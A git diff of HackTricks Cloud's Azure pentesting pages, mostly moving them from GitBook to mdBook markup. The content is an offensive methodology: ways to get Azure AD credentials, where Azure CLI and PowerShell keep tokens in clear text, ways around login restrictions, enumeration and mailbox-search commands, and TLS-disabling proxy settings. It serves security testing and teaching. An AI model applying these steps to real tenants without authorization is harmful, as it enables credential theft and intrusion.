index 02a5e0856..4e36070da 100644
--- a/pentesting-cloud/azure-security/README.md
+++ b/src/pentesting-cloud/azure-security/README.md
@@ -1,25 +1,12 @@
 # Azure Pentesting
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
 
 ## Basic Information
 
-{% content-ref url="az-basic-information/" %}
-[az-basic-information](az-basic-information/)
-{% endcontent-ref %}
+{{#ref}}
+az-basic-information/
+{{#endref}}
 
 ## Azure Pentester/Red Team Methodology
 
@@ -27,94 +14,98 @@ In order to audit an AZURE environment it's very important to know: which **serv
 
 From a Red Team point of view, the **first step to compromise an Azure environment** is to manage to obtain some **credentials** for Azure AD. Here you have some ideas on how to do that:
 
-* **Leaks** in github (or similar) - OSINT
-* **Social** Engineering
-* **Password** reuse (password leaks)
-* Vulnerabilities in Azure-Hosted Applications
-  * [**Server Side Request Forgery**](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf) with access to metadata endpoint
-  * **Local File Read**
-    * `/home/USERNAME/.azure`
-    * `C:\Users\USERNAME\.azure`
-    * The file **`accessTokens.json`** in `az cli` before 2.30 - Jan2022 - stored **access tokens in clear text**
-    * The file **`azureProfile.json`** contains **info** about logged user.
-    * **`az logout`** removes the token.
-    * Older versions of **`Az PowerShell`** stored **access tokens** in **clear** text in **`TokenCache.dat`**. It also stores **ServicePrincipalSecret** in **clear**-text in **`AzureRmContext.json`**. The cmdlet **`Save-AzContext`** can be used to **store** **tokens**.\
+- **Leaks** in github (or similar) - OSINT
+- **Social** Engineering
+- **Password** reuse (password leaks)
+- Vulnerabilities in Azure-Hosted Applications
+  - [**Server Side Request Forgery**](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf) with access to metadata endpoint
+  - **Local File Read**
+    - `/home/USERNAME/.azure`
+    - `C:\Users\USERNAME\.azure`
+    - The file **`accessTokens.json`** in `az cli` before 2.30 - Jan2022 - stored **access tokens in clear text**
+    - The file **`azureProfile.json`** contains **info** about logged user.
+    - **`az logout`** removes the token.
+    - Older versions of **`Az PowerShell`** stored **access tokens** in **clear** text in **`TokenCache.dat`**. It also stores **ServicePrincipalSecret** in **clear**-text in **`AzureRmContext.json`**. The cmdlet **`Save-AzContext`** can be used to **store** **tokens**.\
       Use `Disconnect-AzAccount` to remove them.
-* 3rd parties **breached**
-* **Internal** Employee
-* [**Common Phishing**](https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodology) (credentials or Oauth App)
-  * [Device Code Authentication Phishing](az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md)
-* [Azure **Password Spraying**](az-unauthenticated-enum-and-initial-entry/az-password-spraying.md)
+- 3rd parties **breached**
+- **Internal** Employee
+- [**Common Phishing**](https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodology) (credentials or Oauth App)
+  - [Device Code Authentication Phishing](az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md)
+- [Azure **Password Spraying**](az-unauthenticated-enum-and-initial-entry/az-password-spraying.md)
 
 Even if you **haven't compromised any user** inside the Azure tenant you are attacking, you can **gather some information** from it:
 
-{% content-ref url="az-unauthenticated-enum-and-initial-entry/" %}
-[az-unauthenticated-enum-and-initial-entry](az-unauthenticated-enum-and-initial-entry/)
-{% endcontent-ref %}
+{{#ref}}
+az-unauthenticated-enum-and-initial-entry/
+{{#endref}}
 
-{% hint style="info" %}
-After you have managed to obtain credentials, you need to know **to who do those creds belong**, and **what they have access to**, so you need to perform some basic enumeration:
-{% endhint %}
+> [!NOTE]
+> After you have managed to obtain credentials, you need to know **to who do those creds belong**, and **what they have access to**, so you need to perform some basic enumeration:
 
 ## Basic Enumeration
 
-{% hint style="info" %}
-Remember that the **noisiest** part of the enumeration is the **login**, not the enumeration itself.
-{% endhint %}
+> [!NOTE]
+> Remember that the **noisiest** part of the enumeration is the **login**, not the enumeration itself.
 
 ### SSRF
 
 If you found a SSRF in a machine inside Azure check this page for tricks:
 
-{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf" %}
+{{#ref}}
+https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf
+{{#endref}}
 
 ### Bypass Login Conditions
 
-

+

 
 In cases where you have some valid credentials but you cannot login, these are some common protections that could be in place:
 
-* **IP whitelisting** -- You need to compromise a valid IP
-* **Geo restrictions** -- Find where the user lives or where are the offices of the company and get a IP from the same city (or contry at least)
-* **Browser** -- Maybe only a browser from certain OS (Windows, Linux, Mac, Android, iOS) is allowed. Find out which OS the victim/company uses.
-* You can also try to **compromise Service Principal credentials** as they usually are less limited and its login is less reviewed
+- **IP whitelisting** -- You need to compromise a valid IP
+- **Geo restrictions** -- Find where the user lives or where are the offices of the company and get a IP from the same city (or contry at least)
+- **Browser** -- Maybe only a browser from certain OS (Windows, Linux, Mac, Android, iOS) is allowed. Find out which OS the victim/company uses.
+- You can also try to **compromise Service Principal credentials** as they usually are less limited and its login is less reviewed
 
 After bypassing it, you might be able to get back to your initial setup and you will still have access.
 
 ### Subdomain Takeover
 
-* [https://godiego.co/posts/STO-Azure/](https://godiego.co/posts/STO-Azure/)
+- [https://godiego.co/posts/STO-Azure/](https://godiego.co/posts/STO-Azure/)
 
 ### Whoami
 
-{% hint style="danger" %}
-Learn **how to install** az cli, AzureAD and Az PowerShell in the [**Az - Entra ID**](az-services/az-azuread.md) section.
-{% endhint %}
+> [!CAUTION]
+> Learn **how to install** az cli, AzureAD and Az PowerShell in the [**Az - Entra ID**](az-services/az-azuread.md) section.
 
 One of the first things you need to know is **who you are** (in which environment you are):
 
-{% tabs %}
-{% tab title="az cli" %}
+{{#tabs }}
+{{#tab name="az cli" }}
+
 ```bash
-az account list 
+az account list
 az account tenant list # Current tenant info
 az account subscription list # Current subscription info
 az ad signed-in-user show # Current signed-in user
 az ad signed-in-user list-owned-objects # Get owned objects by current user
 az account management-group list #Not allowed by default
 ```
-{% endtab %}
 
-{% tab title="AzureAD" %}
+{{#endtab }}
+
+{{#tab name="AzureAD" }}
+
 ```powershell
 #Get the current session state
 Get-AzureADCurrentSessionInfo
 #Get details of the current tenant
 Get-AzureADTenantDetail
 ```
-{% endtab %}
 
-{% tab title="Az PowerShell" %}
+{{#endtab }}
+
+{{#tab name="Az PowerShell" }}
+
 ```powershell
 # Get the information about the current context (Account, Tenant, Subscription etc.)
 Get-AzContext
@@ -130,28 +121,27 @@ Get-AzResource
 Get-AzRoleAssignment # For all users
 Get-AzRoleAssignment -SignInName test@corp.onmicrosoft.com # For current user
 ```
-{% endtab %}
-{% endtabs %}
 
-{% hint style="danger" %}
-Oone of the most important commands to enumerate Azure is **`Get-AzResource`** from Az PowerShell as it lets you **know the resources your current user has visibility over**.
+{{#endtab }}
+{{#endtabs }}
 
-You can get the same info in the **web console** going to [https://portal.azure.com/#view/HubsExtension/BrowseAll](https://portal.azure.com/#view/HubsExtension/BrowseAll) or searching for "All resources"
-{% endhint %}
+> [!CAUTION]
+> Oone of the most important commands to enumerate Azure is **`Get-AzResource`** from Az PowerShell as it lets you **know the resources your current user has visibility over**.
+>
+> You can get the same info in the **web console** going to [https://portal.azure.com/#view/HubsExtension/BrowseAll](https://portal.azure.com/#view/HubsExtension/BrowseAll) or searching for "All resources"
 
 ### ENtra ID Enumeration
 
 By default, any user should have **enough permissions to enumerate** things such us, users, groups, roles, service principals... (check [default AzureAD permissions](az-basic-information/#default-user-permissions)).\
 You can find here a guide:
 
-{% content-ref url="az-services/az-azuread.md" %}
-[az-azuread.md](az-services/az-azuread.md)
-{% endcontent-ref %}
+{{#ref}}
+az-services/az-azuread.md
+{{#endref}}
 
-{% hint style="info" %}
-Now that you **have some information about your credentials** (and if you are a red team hopefully you **haven't been detected**). It's time to figure out which services are being used in the environment.\
-In the following section you can check some ways to **enumerate some common services.**
-{% endhint %}
+> [!NOTE]
+> Now that you **have some information about your credentials** (and if you are a red team hopefully you **haven't been detected**). It's time to figure out which services are being used in the environment.\
+> In the following section you can check some ways to **enumerate some common services.**
 
 ## App Service SCM
 
@@ -175,8 +165,9 @@ az account management-group list --output table --debug
 
 In order to do a **MitM** to the tool and **check all the requests** it's sending manually you can do:
 
-{% tabs %}
-{% tab title="Bash" %}
+{{#tabs }}
+{{#tab name="Bash" }}
+
 ```bash
 export ADAL_PYTHON_SSL_NO_VERIFY=1
 export AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1
@@ -189,17 +180,20 @@ export HTTP_PROXY="http://127.0.0.1:8080"
 openssl x509 -in ~/Downloads/cacert.der -inform DER -out ~/Downloads/cacert.pem -outform PEM
 export REQUESTS_CA_BUNDLE=/Users/user/Downloads/cacert.pem
 ```
-{% endtab %}
 
-{% tab title="PS" %}
+{{#endtab }}
+
+{{#tab name="PS" }}
+
 ```bash
 $env:ADAL_PYTHON_SSL_NO_VERIFY=1
 $env:AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1
 $env:HTTPS_PROXY="http://127.0.0.1:8080"
 $env:HTTP_PROXY="http://127.0.0.1:8080"
 ```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 ## Automated Recon Tools
 
@@ -215,7 +209,6 @@ roadrecon gui
 
 ### [Monkey365](https://github.com/silverhack/monkey365)
 
-{% code overflow="wrap" %}
 ```powershell
 Import-Module monkey365
 Get-Help Invoke-Monkey365
@@ -223,7 +216,6 @@ Get-Help Invoke-Monkey365 -Detailed
 Invoke-Monkey365 -IncludeEntraID -ExportTo HTML -Verbose -Debug -InformationAction Continue
 Invoke-Monkey365 - Instance Azure -Analysis All -ExportTo HTML
 ```
-{% endcode %}
 
 ### [**Stormspotter**](https://github.com/Azure/Stormspotter)
 
@@ -400,24 +392,11 @@ Invoke-GraphOpenInboxFinder -Tokens $tokens -Userlist users.txt
 
 #Get-TenantID
 #This module attempts to gather a tenant ID associated with a domain.
-Get-TenantID -Domain 
+Get-TenantID -Domain
 
 #Invoke-GraphRunner
 #Runs Invoke-GraphRecon, Get-AzureADUsers, Get-SecurityGroups, Invoke-DumpCAPS, Invoke-DumpApps, and then uses the default_detectors.json file to search with Invoke-SearchMailbox, Invoke-SearchSharePointAndOneDrive, and Invoke-SearchTeams.
 Invoke-GraphRunner -Tokens $tokens
 ```
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-basic-information/README.md b/src/pentesting-cloud/azure-security/az-basic-information/README.md
similarity index 65%
rename from pentesting-cloud/azure-security/az-basic-information/README.md
rename to src/pentesting-cloud/azure-security/az-basic-information/README.md
index 003c4ae03..483d357bd 100644
--- a/pentesting-cloud/azure-security/az-basic-information/README.md
+++ b/src/pentesting-cloud/azure-security/az-basic-information/README.md
@@ -1,19 +1,6 @@
 # Az - Basic Information
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Organization Hierarchy
 
@@ -21,23 +8,23 @@ Learn & practice GCP Hacking: 
https://td-mainsite-cdn.tutorialsdojo.com/wp-content/uploads/2023/02/managementgroups-768x474.png

+
https://td-mainsite-cdn.tutorialsdojo.com/wp-content/uploads/2023/02/managementgroups-768x474.png

 
 ### Azure Subscriptions
 
-* It’s another **logical container where resources** (VMs, DBs…) can be run and will be billed.
-* Its **parent** is always a **management group** (and it can be the root management group) as subscriptions cannot contain other subscriptions.
-* It **trust only one Entra ID** directory
-* **Permissions** applied at the subscription level (or any of its parents) are **inherited** to all the resources inside the subscription
+- It’s another **logical container where resources** (VMs, DBs…) can be run and will be billed.
+- Its **parent** is always a **management group** (and it can be the root management group) as subscriptions cannot contain other subscriptions.
+- It **trust only one Entra ID** directory
+- **Permissions** applied at the subscription level (or any of its parents) are **inherited** to all the resources inside the subscription
 
 ### Resource Groups
 
@@ -53,11 +40,11 @@ Every resource in Azure has an Azure Resource ID that identifies it.
 
 The format of an Azure Resource ID is as follows:
 
-* `/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}`
+- `/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}`
 
 For a virtual machine named myVM in a resource group `myResourceGroup` under subscription ID `12345678-1234-1234-1234-123456789012`, the Azure Resource ID looks like this:
 
-* `/subscriptions/12345678-1234-1234-1234-123456789012/resourceGroups/myResourceGroup/providers/Microsoft.Compute/virtualMachines/myVM`
+- `/subscriptions/12345678-1234-1234-1234-123456789012/resourceGroups/myResourceGroup/providers/Microsoft.Compute/virtualMachines/myVM`
 
 ## Azure vs Entra ID vs Azure AD Domain Services
 
@@ -77,74 +64,72 @@ Entra Domain Services extends the capabilities of Entra ID by offering **managed
 
 ### Users
 
-* **New users**
-  * Indicate email name and domain from selected tenant
-  * Indicate Display name
-  * Indicate password
-  * Indicate properties (first name, job title, contact info…)
-    * Default user type is “**member**”
-* **External users**
-  * Indicate email to invite and display name (can be a non Microsft email)
-  * Indicate properties
-    * Default user type is “**Guest**”
+- **New users**
+  - Indicate email name and domain from selected tenant
+  - Indicate Display name
+  - Indicate password
+  - Indicate properties (first name, job title, contact info…)
+    - Default user type is “**member**”
+- **External users**
+  - Indicate email to invite and display name (can be a non Microsft email)
+  - Indicate properties
+    - Default user type is “**Guest**”
 
 ### Members & Guests Default Permissions
 
 You can check them in [https://learn.microsoft.com/en-us/entra/fundamentals/users-default-permissions](https://learn.microsoft.com/en-us/entra/fundamentals/users-default-permissions) but among other actions a member will be able to:
 
-* Read all users, Groups, Applications, Devices, Roles, Subscriptions, and their public properties
-* Invite Guests (_can be turned off_)
-* Create Security groups
-* Read non-hidden Group memberships
-* Add guests to Owned groups
-* Create new application (_can be turned off_)
-* Add up to 50 devices to Azure (_can be turned off_)
+- Read all users, Groups, Applications, Devices, Roles, Subscriptions, and their public properties
+- Invite Guests (_can be turned off_)
+- Create Security groups
+- Read non-hidden Group memberships
+- Add guests to Owned groups
+- Create new application (_can be turned off_)
+- Add up to 50 devices to Azure (_can be turned off_)
 
-{% hint style="info" %}
-Remember that to enumerate Azure resources the user needs an explicit grant of the permission.
-{% endhint %}
+> [!NOTE]
+> Remember that to enumerate Azure resources the user needs an explicit grant of the permission.
 
 ### Users Default Configurable Permissions
 
-* **Members (**[**docs**](https://learn.microsoft.com/en-gb/entra/fundamentals/users-default-permissions#restrict-member-users-default-permissions)**)**
-  * Register Applications: Default **Yes**
-  * Restrict non-admin users from creating tenants: Default **No**
-  * Create security groups: Default **Yes**
-  * Restrict access to Microsoft Entra administration portal: Default **No**
-    * This doesn’t restrict API access to the portal (only web)
-  * Allow users to connect work or school account with LinkedIn: Default **Yes**
-  * Show keep user signed in: Default **Yes**
-  * Restrict users from recovering the BitLocker key(s) for their owned devices: Default No (check in Device Settings)
-  * Read other users: Default **Yes** (via Microsoft Graph)
-* **Guests**
-  * **Guest user access restrictions**
-    * **Guest users have the same access as members** grants all member user permissions to guest users by default.
-    * **Guest users have limited access to properties and memberships of directory objects (default)** restricts guest access to only their own user profile by default. Access to other users and group information is no longer allowed.
-    * **Guest user access is restricted to properties and memberships of their own directory objects** is the most restrictive one.
-  * **Guests can invite**
-    * **Anyone in the organization can invite guest users including guests and non-admins (most inclusive) - Default**
-    * **Member users and users assigned to specific admin roles can invite guest users including guests with member permissions**
-    * **Only users assigned to specific admin roles can invite guest users**
-    * **No one in the organization can invite guest users including admins (most restrictive)**
-  * **External user leave**: Default **True**
-    * Allow external users to leave the organization
+- **Members (**[**docs**](https://learn.microsoft.com/en-gb/entra/fundamentals/users-default-permissions#restrict-member-users-default-permissions)**)**
+  - Register Applications: Default **Yes**
+  - Restrict non-admin users from creating tenants: Default **No**
+  - Create security groups: Default **Yes**
+  - Restrict access to Microsoft Entra administration portal: Default **No**
+    - This doesn’t restrict API access to the portal (only web)
+  - Allow users to connect work or school account with LinkedIn: Default **Yes**
+  - Show keep user signed in: Default **Yes**
+  - Restrict users from recovering the BitLocker key(s) for their owned devices: Default No (check in Device Settings)
+  - Read other users: Default **Yes** (via Microsoft Graph)
+- **Guests**
+  - **Guest user access restrictions**
+    - **Guest users have the same access as members** grants all member user permissions to guest users by default.
+    - **Guest users have limited access to properties and memberships of directory objects (default)** restricts guest access to only their own user profile by default. Access to other users and group information is no longer allowed.
+    - **Guest user access is restricted to properties and memberships of their own directory objects** is the most restrictive one.
+  - **Guests can invite**
+    - **Anyone in the organization can invite guest users including guests and non-admins (most inclusive) - Default**
+    - **Member users and users assigned to specific admin roles can invite guest users including guests with member permissions**
+    - **Only users assigned to specific admin roles can invite guest users**
+    - **No one in the organization can invite guest users including admins (most restrictive)**
+  - **External user leave**: Default **True**
+    - Allow external users to leave the organization
 
-{% hint style="success" %}
-Even if restricted by default, users (members and guests) with granted permissions could perform the previous actions.
-{% endhint %}
+> [!TIP]
+> Even if restricted by default, users (members and guests) with granted permissions could perform the previous actions.
 
 ### **Groups**
 
 There are **2 types of groups**:
 
-* **Security**: This type of group is used to give members access to aplications, resources and assign licenses. Users, devices, service principals and other groups an be members.
-* **Microsoft 365**: This type of group is used for collaboration, giving members access to a shared mailbox, calendar, files, SharePoint site, and so on. Group members can only be users.
-  * This will have an **email address** with the domain of the EntraID tenant.
+- **Security**: This type of group is used to give members access to aplications, resources and assign licenses. Users, devices, service principals and other groups an be members.
+- **Microsoft 365**: This type of group is used for collaboration, giving members access to a shared mailbox, calendar, files, SharePoint site, and so on. Group members can only be users.
+  - This will have an **email address** with the domain of the EntraID tenant.
 
 There are **2 types of memberships**:
 
-* **Assigned**: Allow to manually add specific members to a group.
-* **Dynamic membership**: Automatically manages membership using rules, updating group inclusion when members attributes change.
+- **Assigned**: Allow to manually add specific members to a group.
+- **Dynamic membership**: Automatically manages membership using rules, updating group inclusion when members attributes change.
 
 ### **Service Principals**
 
@@ -152,8 +137,8 @@ A **Service Principal** is an **identity** created for **use** with **applicatio
 
 It's possible to **directly login as a service principal** by generating it a **secret** (password), a **certificate**, or granting **federated** access to third party platforms (e.g. Github Actions) over it.
 
-* If you choose **password** auth (by default), **save the password generated** as you won't be able to access it again.
-* If you choose certificate authentication, make sure the **application will have access over the private key**.
+- If you choose **password** auth (by default), **save the password generated** as you won't be able to access it again.
+- If you choose certificate authentication, make sure the **application will have access over the private key**.
 
 ### App Registrations
 
@@ -174,24 +159,24 @@ An **App Registration** is a configuration that allows an application to integra
 
 **User consent for applications**
 
-* **Do not allow user consent**
-  * An administrator will be required for all apps.
-* **Allow user consent for apps from verified publishers, for selected permissions (Recommended)**
-  * All users can consent for permissions classified as "low impact", for apps from verified publishers or apps registered in this organization.
-  * **Default** low impact permissions (although you need to accept to add them as low):
-    * User.Read - sign in and read user profile
-    * offline\_access - maintain access to data that users have given it access to
-    * openid - sign users in
-    * profile - view user's basic profile
-    * email - view user's email address
-* **Allow user consent for apps (Default)**
-  * All users can consent for any app to access the organization's data.
+- **Do not allow user consent**
+  - An administrator will be required for all apps.
+- **Allow user consent for apps from verified publishers, for selected permissions (Recommended)**
+  - All users can consent for permissions classified as "low impact", for apps from verified publishers or apps registered in this organization.
+  - **Default** low impact permissions (although you need to accept to add them as low):
+    - User.Read - sign in and read user profile
+    - offline_access - maintain access to data that users have given it access to
+    - openid - sign users in
+    - profile - view user's basic profile
+    - email - view user's email address
+- **Allow user consent for apps (Default)**
+  - All users can consent for any app to access the organization's data.
 
 **Admin consent requests**: Default **No**
 
-* Users can request admin consent to apps they are unable to consent to
-* If **Yes**: It’s possible to indicate Users, Groups and Roles that can consent requests
-  * Configure also if users will receive email notifications and expiration reminders 
+- Users can request admin consent to apps they are unable to consent to
+- If **Yes**: It’s possible to indicate Users, Groups and Roles that can consent requests
+  - Configure also if users will receive email notifications and expiration reminders 
 
 ### **Managed Identity (Metadata)**
 
@@ -199,8 +184,8 @@ Managed identities in Azure Active Directory offer a solution for **automaticall
 
 There are two types of managed identities:
 
-* **System-assigned**. Some Azure services allow you to **enable a managed identity directly on a service instance**. When you enable a system-assigned managed identity, a **service principal** is created in the Entra ID tenant trusted by the subscription where the resource is located. When the **resource** is **deleted**, Azure automatically **deletes** the **identity** for you.
-* **User-assigned**. It's also possible for users to generate managed identities. These are created inside a resource group inside a subscription and a service principal will be created in the EntraID trusted by the subscription. Then, you can assign the managed identity to one or **more instances** of an Azure service (multiple resources). For user-assigned managed identities, the **identity is managed separately from the resources that use it**.
+- **System-assigned**. Some Azure services allow you to **enable a managed identity directly on a service instance**. When you enable a system-assigned managed identity, a **service principal** is created in the Entra ID tenant trusted by the subscription where the resource is located. When the **resource** is **deleted**, Azure automatically **deletes** the **identity** for you.
+- **User-assigned**. It's also possible for users to generate managed identities. These are created inside a resource group inside a subscription and a service principal will be created in the EntraID trusted by the subscription. Then, you can assign the managed identity to one or **more instances** of an Azure service (multiple resources). For user-assigned managed identities, the **identity is managed separately from the resources that use it**.
 
 Managed Identities **don't generate eternal credentials** (like passwords or certificates) to access as the service principal attached to it.
 
@@ -216,23 +201,23 @@ Administrative units allows to **give permissions from a role over a specific po
 
 Example:
 
-* Scenario: A company wants regional IT admins to manage only the users in their own region.
-* Implementation:
-  * Create Administrative Units for each region (e.g., "North America AU", "Europe AU").
-    * Populate AUs with users from their respective regions.
-      * AUs can **contain users, groups, or devices**
-      * AUs support **dynamic memberships**
-      * AUs **cannot contain AUs**
-    * Assign Admin Roles:
-      * Grant the "User Administrator" role to regional IT staff, scoped to their region's AU.
-* Outcome: Regional IT admins can manage user accounts within their region without affecting other regions.
+- Scenario: A company wants regional IT admins to manage only the users in their own region.
+- Implementation:
+  - Create Administrative Units for each region (e.g., "North America AU", "Europe AU").
+    - Populate AUs with users from their respective regions.
+      - AUs can **contain users, groups, or devices**
+      - AUs support **dynamic memberships**
+      - AUs **cannot contain AUs**
+    - Assign Admin Roles:
+      - Grant the "User Administrator" role to regional IT staff, scoped to their region's AU.
+- Outcome: Regional IT admins can manage user accounts within their region without affecting other regions.
 
 ### Entra ID Roles
 
-* In order to manage Entra ID there are some **built-in roles** that can be assigned to Entra ID principals to manage Entra ID
-  * Check the roles in [https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference](https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference)
-* The most privileged role is **Global Administrator**
-* In the Description of the role it’s possible to see its **granular permissions**
+- In order to manage Entra ID there are some **built-in roles** that can be assigned to Entra ID principals to manage Entra ID
+  - Check the roles in [https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference](https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference)
+- The most privileged role is **Global Administrator**
+- In the Description of the role it’s possible to see its **granular permissions**
 
 ## Roles & Permissions
 
@@ -262,70 +247,68 @@ Depending on the scope the role was assigned to, the **role** cold be **inherite
 
 This roles can **also be assigned over logic containers** (such as management groups, subscriptions and resource groups) and the principals affected will have them **over the resources inside those containers**.
 
-* Find here a list with [**all the Azure built-in roles**](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles).
-* Find here a list with [**all the Entra ID built-in roles**](https://learn.microsoft.com/en-us/azure/active-directory/roles/permissions-reference).
+- Find here a list with [**all the Azure built-in roles**](https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles).
+- Find here a list with [**all the Entra ID built-in roles**](https://learn.microsoft.com/en-us/azure/active-directory/roles/permissions-reference).
 
 ### Custom Roles
 
-* It’s also possible to create [**custom roles**](https://learn.microsoft.com/en-us/azure/role-based-access-control/custom-roles)
-* They are created inside a scope, although a role can be in several scopes (management groups, subscription and resource groups)
-* It’s possible to configure all the granular permissions the custom role will have
-* It’s possible to exclude permissions
-  * A principal with a excluded permission won’t be able to use it even if the permissions is being granted elsewhere
-* It’s possible to use wildcards
-* The used format is a JSON
-  * `actions` are for control actions over the resource
-  * `dataActions` are permissions over the data within the object
+- It’s also possible to create [**custom roles**](https://learn.microsoft.com/en-us/azure/role-based-access-control/custom-roles)
+- They are created inside a scope, although a role can be in several scopes (management groups, subscription and resource groups)
+- It’s possible to configure all the granular permissions the custom role will have
+- It’s possible to exclude permissions
+  - A principal with a excluded permission won’t be able to use it even if the permissions is being granted elsewhere
+- It’s possible to use wildcards
+- The used format is a JSON
+  - `actions` are for control actions over the resource
+  - `dataActions` are permissions over the data within the object
 
 Example of permissions JSON for a custom role:
 
 ```json
 {
-    "properties": {
-        "roleName": "",
-        "description": "",
-        "assignableScopes": [
-            "/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f"
+  "properties": {
+    "roleName": "",
+    "description": "",
+    "assignableScopes": ["/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f"],
+    "permissions": [
+      {
+        "actions": [
+          "Microsoft.DigitalTwins/register/action",
+          "Microsoft.DigitalTwins/unregister/action",
+          "Microsoft.DigitalTwins/operations/read",
+          "Microsoft.DigitalTwins/digitalTwinsInstances/read",
+          "Microsoft.DigitalTwins/digitalTwinsInstances/write",
+          "Microsoft.CostManagement/exports/*"
         ],
-        "permissions": [
-            {
-                "actions": [
-                    "Microsoft.DigitalTwins/register/action",
-                    "Microsoft.DigitalTwins/unregister/action",
-                    "Microsoft.DigitalTwins/operations/read",
-                    "Microsoft.DigitalTwins/digitalTwinsInstances/read",
-                    "Microsoft.DigitalTwins/digitalTwinsInstances/write",
-                    "Microsoft.CostManagement/exports/*"
-                ],
-                "notActions": [
-                    "Astronomer.Astro/register/action",
-                    "Astronomer.Astro/unregister/action",
-                    "Astronomer.Astro/operations/read",
-                    "Astronomer.Astro/organizations/read"
-                ],
-                "dataActions": [],
-                "notDataActions": []
-            }
-        ]
-    }
+        "notActions": [
+          "Astronomer.Astro/register/action",
+          "Astronomer.Astro/unregister/action",
+          "Astronomer.Astro/operations/read",
+          "Astronomer.Astro/organizations/read"
+        ],
+        "dataActions": [],
+        "notDataActions": []
+      }
+    ]
+  }
 }
 ```
 
 ### Permissions order
 
-* In order for a **principal to have some access over a resource** he needs an explicit role being granted to him (anyhow) **granting him that permission**.
-* An explicit **deny role assignment takes precedence** over the role granting the permission.
+- In order for a **principal to have some access over a resource** he needs an explicit role being granted to him (anyhow) **granting him that permission**.
+- An explicit **deny role assignment takes precedence** over the role granting the permission.
 
-
https://link.springer.com/chapter/10.1007/978-1-4842-7325-8_10

+
https://link.springer.com/chapter/10.1007/978-1-4842-7325-8_10

 
 ### Global Administrator
 
 Global Administrator is a role from Entra ID that grants **complete control over the Entra ID tenant**. However, it doesn't grant any permissions over Azure resources by default.
 
 Users with the Global Administrator role has the ability to '**elevate' to User Access Administrator Azure role in the Root Management Group**. So Global Administrators can manage access in **all Azure subscriptions and management groups.**\
-This elevation can be done at the end of the page: [https://portal.azure.com/#view/Microsoft\_AAD\_IAM/ActiveDirectoryMenuBlade/\~/Properties](https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/~/Properties)
+This elevation can be done at the end of the page: [https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/\~/Properties](https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/~/Properties)
 
-

+

 
 ### Azure Policies
 
@@ -358,10 +341,7 @@ Azure policy json example:
   "policyRule": {
     "if": {
       "field": "location",
-      "notIn": [
-        "eastus",
-        "westus"
-      ]
+      "notIn": ["eastus", "westus"]
     },
     "then": {
